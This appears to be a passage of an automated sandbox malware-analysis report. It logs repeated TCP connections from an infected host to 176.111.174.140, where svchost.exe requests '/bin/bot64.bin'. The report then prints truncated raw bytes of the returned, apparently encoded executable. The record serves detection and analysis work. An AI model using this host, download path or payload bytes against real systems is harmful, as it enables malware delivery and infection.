                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.208475113 CET8049885176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.211669922 CET8049891176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.211755037 CET4989180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.212738991 CET4989180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.339818001 CET8049891176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.339895010 CET4989180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.459785938 CET8049891176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.669276953 CET8049891176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.669605017 CET8049891176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.669684887 CET4989180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.670645952 CET4989180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.790872097 CET4989280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.795926094 CET8049891176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.915914059 CET8049892176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.916078091 CET4989280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.916146994 CET4989280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:56.039808989 CET8049892176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:56.039875984 CET4989280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:56.159770966 CET8049892176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.464867115 CET8049892176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.465034008 CET8049892176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.465115070 CET4989280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.466347933 CET4989280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.569716930 CET4989880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.586492062 CET8049892176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.699052095 CET8049898176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.699199915 CET4989880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.699301958 CET4989880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.820836067 CET8049898176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.820899010 CET4989880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.944921970 CET8049898176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.492404938 CET8049898176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.492665052 CET8049898176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.492724895 CET4989880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.498859882 CET4989880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.600888014 CET4990480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.622471094 CET8049898176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.723146915 CET8049904176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.723221064 CET4990480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.723320961 CET4990480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.850064993 CET8049904176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.850147009 CET4990480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.970712900 CET8049904176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.691906929 CET8049904176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.692058086 CET8049904176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.692141056 CET4990480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.693569899 CET4990480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.804394960 CET4990580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.813384056 CET8049904176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.925189018 CET8049905176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.925345898 CET4990580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.925447941 CET4990580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:02.045161009 CET8049905176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:02.045257092 CET4990580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:02.164917946 CET8049905176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:03.949779034 CET8049905176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:03.949871063 CET8049905176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:03.949949980 CET4990580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:03.951308966 CET4990580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.054299116 CET4991180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.075897932 CET8049905176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.175942898 CET8049911176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.176054001 CET4991180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.176666021 CET4991180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.296813965 CET8049911176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.296900988 CET4991180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.418580055 CET8049911176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.709698915 CET8049911176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.709800959 CET8049911176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.709877014 CET4991180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.711344957 CET4991180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.819864988 CET4991780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.832698107 CET8049911176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.940074921 CET8049917176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.940165997 CET4991780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.940238953 CET4991780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:06.060055017 CET8049917176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:06.060149908 CET4991780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:06.180078983 CET8049917176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.440414906 CET8049917176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.440535069 CET8049917176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.440581083 CET4991780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.442003965 CET4991780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.554047108 CET4992280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.562752962 CET8049917176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.673827887 CET8049922176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.673999071 CET4992280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.674076080 CET4992280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.794280052 CET8049922176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.794384003 CET4992280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.914283991 CET8049922176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:08.431723118 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:08.651729107 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:08.689558983 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:08.741158009 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:09.022435904 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:09.038081884 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:09.428716898 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:09.753468037 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:09.819375992 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.672672987 CET8049922176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.672720909 CET8049922176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.672801971 CET4992280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.674102068 CET4992280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.741180897 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.788413048 CET4992780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.799251080 CET8049922176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.908262968 CET8049927176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.908416986 CET4992780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.908473969 CET4992780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:11.032493114 CET8049927176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:11.032638073 CET4992780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:11.153096914 CET8049927176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:11.210057974 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:11.241218090 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.622927904 CET8049927176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.623049021 CET8049927176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.623120070 CET4992780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.650554895 CET4992780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.763381004 CET4992980192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.786681890 CET8049927176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.883394003 CET8049929176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.883589983 CET4992980192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.900785923 CET4992980192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:13.021106005 CET8049929176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:13.021151066 CET4992980192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:13.140990973 CET8049929176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:13.241231918 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:13.819380999 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.038117886 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.706790924 CET8049929176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.706806898 CET8049929176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.706886053 CET4992980192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.708328962 CET4992980192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.819869995 CET4993480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.829425097 CET8049929176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.946583033 CET8049934176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.946775913 CET4993480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.946818113 CET4993480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:15.072649956 CET8049934176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:15.072750092 CET4993480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:15.193521976 CET8049934176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.759512901 CET8049934176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.759602070 CET8049934176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.759670973 CET4993480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.761049032 CET4993480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.866688967 CET4993880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.887761116 CET8049934176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.989270926 CET8049938176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.989382029 CET4993880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.989470005 CET4993880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:17.109158993 CET8049938176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:17.109296083 CET4993880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:17.228959084 CET8049938176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.241230965 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.759552956 CET8049938176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.759682894 CET8049938176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.759762049 CET4993880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.776752949 CET4993880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.882390022 CET4994080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.900002956 CET8049938176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.002772093 CET8049940176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.002861977 CET4994080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.008624077 CET4994080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.022456884 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.128979921 CET8049940176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.129143000 CET4994080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.251168966 CET8049940176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.741209030 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.814394951 CET8049940176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.814510107 CET8049940176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.814606905 CET4994080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.816030979 CET4994080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.929318905 CET4994680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.935899973 CET8049940176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.049135923 CET8049946176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.051529884 CET4994680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.051629066 CET4994680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.171452999 CET8049946176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.171528101 CET4994680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.291450977 CET8049946176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:23.984451056 CET8049946176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:23.984585047 CET8049946176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:23.984666109 CET4994680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:26.440891981 CET4994680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:26.562494993 CET8049946176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:27.850548983 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:29.116235971 CET4973180192.168.2.4176.111.174.140

                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                  • 176.111.174.140

                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449730176.111.174.140807040C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:18.569546938 CET203OUTGET /bin/bot64.bin HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906650066 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:19 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 23:48:31 GMT
                                                                                                                                                                                                                                                  ETag: "43a00-6283e11c07987"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 276992
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Data Raw: e7 f0 3a aa a9 aa aa aa ae aa aa aa 55 55 aa aa 12 aa aa aa aa aa aa aa ea aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa ab aa aa a4 b5 10 a4 aa 1e a3 67 8b 12 ab e6 67 8b fe c2 c3 d9 8a da d8 c5 cd d8 cb c7 8a c9 cb c4 c4 c5 de 8a c8 cf 8a d8 df c4 8a c3 c4 8a ee e5 f9 8a c7 c5 ce cf 84 a7 a7 a0 8e aa aa aa aa aa aa aa 73 b0 ec 0e 37 d1 82 5d 37 d1 82 5d 37 d1 82 5d f3 14 4f 5d 3d d1 82 5d f3 14 4d 5d 76 d1 82 5d f3 14 4c 5d 86 d1 82 5d 37 d1 83 5d 95 d1 82 5d cb a6 3b 5d 26 d1 82 5d 10 17 4c 5d 32 d1 82 5d 10 17 4d 5d 2d d1 82 5d 10 17 48 5d 36 d1 82 5d 10 17 4b 5d 36 d1 82 5d 10 17 4e 5d 36 d1 82 5d f8 c3 c9 c2 37 d1 82 5d aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa fa ef aa aa ce 2c ac aa 48 2e e6 cd aa aa aa aa aa aa aa aa 5a aa 88 8a a1 a8 a1 aa aa 7e a8 aa aa ac a8 aa aa aa aa aa 1a 71 ab aa aa ba aa aa aa aa aa 2a ab aa aa aa aa ba aa aa aa a8 aa aa ac aa aa aa aa aa aa aa ac aa aa aa aa aa aa aa aa 8a [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: :UUggs7]7]7]O]=]M]v]L]]7]];]&]L]2]M]-]H]6]K]6]N]6]7],H.Z~q*ffJJZZy~vZtrbzjvJJBZ
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906671047 CET224INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa e2 29 46 82 99 6a e2 2f 63 de ba e2 29 53 55 dd a5 42 50 02 ab
                                                                                                                                                                                                                                                  Data Ascii: )Fj/c)SUBP/j)niB7fffffffffff#)F!S!b!pBb'!y!e!j!)nC#)F!RBc!r/j!eB#'!#!)niffffffff#
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906683922 CET1236INData Raw: 8e a2 fd e2 29 46 8a e2 21 53 e3 21 62 e2 21 70 42 f2 27 aa aa e2 21 79 e2 21 65 e6 21 6a e2 21 f6 8e 9a e2 29 6e 8a f5 43 3a 55 55 55 ea f9 e2 29 46 8a e2 21 73 42 b8 aa aa aa e2 21 69 e2 29 6e 8a f1 69 66 66 66 66 66 66 66 66 66 99 6a e2 23 eb
                                                                                                                                                                                                                                                  Data Ascii: )F!S!b!pB'!y!e!j!)nC:UUU)F!sB!i)nifffffffffj##!kiff#)F!S'!pB\&!e!zBUUUjx!eB!y!eB!!m)nifffff)F!sB('YN#!i)nifffffffffffffff)F!sBhUUU'O
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906722069 CET1236INData Raw: e2 23 d6 8e 8a 55 bf 8c 71 a8 aa 2f 6a a5 2e 20 aa aa aa eb a5 1d ec ac 55 6c e2 29 69 82 91 5a d6 6d 21 fe 8e c2 e2 21 e6 8e fa e2 27 ee 8e c2 e6 27 ef 2a eb 13 9a aa aa aa e2 23 ee 8e 8a 42 8b 14 a8 aa e2 21 ff 22 e2 21 e6 8e fa e6 27 ee 8e da
                                                                                                                                                                                                                                                  Data Ascii: #Uq/j. Ul)iZm!!''*#B!"!')h#U`p/j!!'#/U-p/j!Up!!Up!Up!eB!!6!m!'ZfB+niffffff
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906734943 CET1236INData Raw: eb fd e2 27 06 8e 82 54 55 55 e2 2b 46 72 a8 aa aa e2 21 af f7 68 a9 aa e2 99 6e e2 23 2f 6a ab aa aa e2 21 2f ea a8 aa aa e2 21 17 da a8 aa aa 23 e6 8e c2 e2 23 ef 3a e2 21 2f f2 a8 aa aa e3 21 62 e2 23 ee 8e d2 e2 21 2f ca a8 aa aa e6 23 e7 2a
                                                                                                                                                                                                                                                  Data Ascii: 'TUU+Fr!hn#/j!/!##:!/!b#!/#*#2!/!P#Ba!e!ZBj!BB!g!JUUr!r/\!|!fUy'xmlB<c'j'c#U1r'^v'U8'Av
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906747103 CET1236INData Raw: 5f 7c a9 aa e6 27 af bc 51 55 55 e2 27 bf 45 73 a8 aa e2 27 a7 8a 70 a8 aa 42 49 cb aa aa 99 63 42 36 c8 aa aa 99 6a e2 29 6e 82 69 66 66 66 66 66 e2 2f 78 de bd cc cc cc a5 b5 2e aa aa aa aa aa ee 9a ab e2 27 e3 ab e2 55 60 df 5e 59 69 66 66 e6
                                                                                                                                                                                                                                                  Data Ascii: _|'QUU'Es'pBIcB6j)nifffff/x.'U`^Yiff###)FmTUUU!Z!p![!P)eB`!bm!QA!!b{C]M{@`!kkj'!S'!dBXUU!b'B)#A!!!
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906954050 CET1236INData Raw: 13 56 55 55 2e 6a de 8b e2 21 61 42 27 57 55 55 e6 21 6d e2 21 7c e2 21 62 42 85 aa aa aa e2 21 7d e2 21 61 42 ce 56 55 55 e2 21 de 8e 92 e2 21 69 e2 21 f6 8e 9a e2 29 6e 8a f5 69 66 a5 1c a8 22 ab 69 66 66 66 66 66 66 66 66 66 66 ea f9 e2 29 46
                                                                                                                                                                                                                                                  Data Ascii: VUU.j!aB'WUU!m!|!bB!}!aBVUU!!i!)nif"iffffffffff)F!s/jB<!i)niffffCfffffffffff!`C?ffffffff#)F!b!R!pBv#/jBAB!j!}!aBGUU!i!)niffffffffffff)F!j!p!k!z!aB
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906965971 CET1236INData Raw: a8 aa 21 5a 2f 6a df b8 e2 21 c6 8e fa e2 21 de 8e f2 99 6a e2 29 6e ea f1 69 55 6a e2 23 d6 8e ca e2 c9 62 42 36 33 ab aa e2 21 52 e2 2f 6a de 80 e2 23 c6 8e 92 e2 23 c6 8e 9a eb 29 63 55 e6 21 69 99 78 13 43 57 aa aa 23 de 8e 82 e2 23 ee 8e 8a
                                                                                                                                                                                                                                                  Data Ascii: !Z/j!!j)niUj#bB63!R/j##)cU!ixCW##Ukm!m!!!)nifffffffff)Fj!s/c.#!k#)cUCWx##Um!Z/jj!)niUj#bcB[2!R/j!!)ni)cU!i
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906976938 CET776INData Raw: e2 21 65 e6 21 6a e2 21 f6 8e 9a e2 29 6e 8a f5 43 aa aa aa aa e2 23 f6 8e a2 fd e2 29 46 8a e2 21 53 e3 21 62 e2 21 70 42 e2 da aa aa e2 21 79 e2 21 65 e6 21 6a e2 21 f6 8e 9a e2 29 6e 8a f5 43 6a a7 aa aa e2 23 f6 8e ba fd e2 29 46 8a e2 21 70
